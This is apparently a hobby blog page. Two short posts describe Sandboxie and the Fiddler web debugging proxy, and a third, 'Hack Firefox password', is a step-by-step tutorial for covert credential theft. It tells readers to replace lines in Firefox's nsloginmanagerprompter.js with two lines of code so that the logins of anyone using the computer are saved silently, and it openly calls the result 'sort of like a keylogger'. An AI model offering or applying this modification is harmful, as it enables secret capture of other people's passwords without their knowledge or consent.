- Secure Web Browsing: Run your web browser in Sandboxie – preventing any malicious software downloaded by the browser from harming your machine
- Enhanced Privacy: Keep browsing history, cookies and cached temporary files in the sandbox – not on your machine
- Safe Social Networking: Click on Twitter links and Facebook updates without the fear of social networking worms infecting your machine
- Secure e-mail: Viruses and other malicious software that might be hiding in your e-mail attachments can’t break out of the sandbox and infect your machine
- Keep your system running smoothly: Prevent wear-and-tear in Windows by installing software in the isolated container
Thursday, 27 November 2014
Keep safe using sandboxie
Saturday, 29 March 2014
aPP: Fiddler
Fiddler is a free web debugging proxy which logs all HTTP(s) traffic between your computer and the Internet. Use it to debug traffic from virtually any application that supports a proxy like IE, Chrome, Safari, Firefox, Opera and more.
Easily manipulate and edit web sessions. All you need to do is set a breakpoint to pause the processing of the session and permit alteration of the request/response. You can also compose your own HTTP requests to run through Fiddler.
Use Fiddler for security testing your web applications -- decrypt HTTPS traffic, and display and modify requests using a man-in-the-middle decryption technique. Configure Fiddler to decrypt all traffic, or only specific sessions.
Fiddler lets you see the “total page weight,” HTTP caching and compression at a glance. Isolate performance bottlenecks with rules like “Flag any uncompressed responses larger than 25kb.”
Benefit from a rich extensibility model, ranging from simple FiddlerScript to powerful Extensions which can be developed using any .NET language.
Debug traffic from PC, Mac or Linux systems and mobile devices. Ensure the proper cookies, headers and cache directives are transferred between the client and server. Supports any framework, including .NET, Java, Ruby, etc.
DOWNDLOAD HERE
Built for .NET 4
Download Fiddler4Version 4.4.6.2, EXE, 787 KB
Released on February 28, 2014
Built for .NET 2
Download Fiddler2Version 2.4.6.2, EXE, 759 KB
Released on February 28, 2014
Friday, 16 March 2012
:Hack Firefox password
Hack Firefox To Auto Save Passwords Without Notification
Hack Firefox To Auto Save Passwords Without Notification
Hi all users,
Here is a short tutorial on how to get firefox to save usernames + passwords automatically with any notifications (Sort of like a keylogger) just by editing 1 of the javascript files.
ideal if you want to get someones login details who uses your computer.
1) First you need to close firefox.
2) Now locate the nsloginmanagerprompter.js which is normally found in
C:\ProgramFiles\MozillaFirefox\Components\
3) Open nsloginmanagerprompter.js with notepad ++
4) Replace the entire line 804 to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file.
Now your done go into firefox and try it out.. Smile
To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security.
They will be saved into the saved passwords section.
Enjoy.......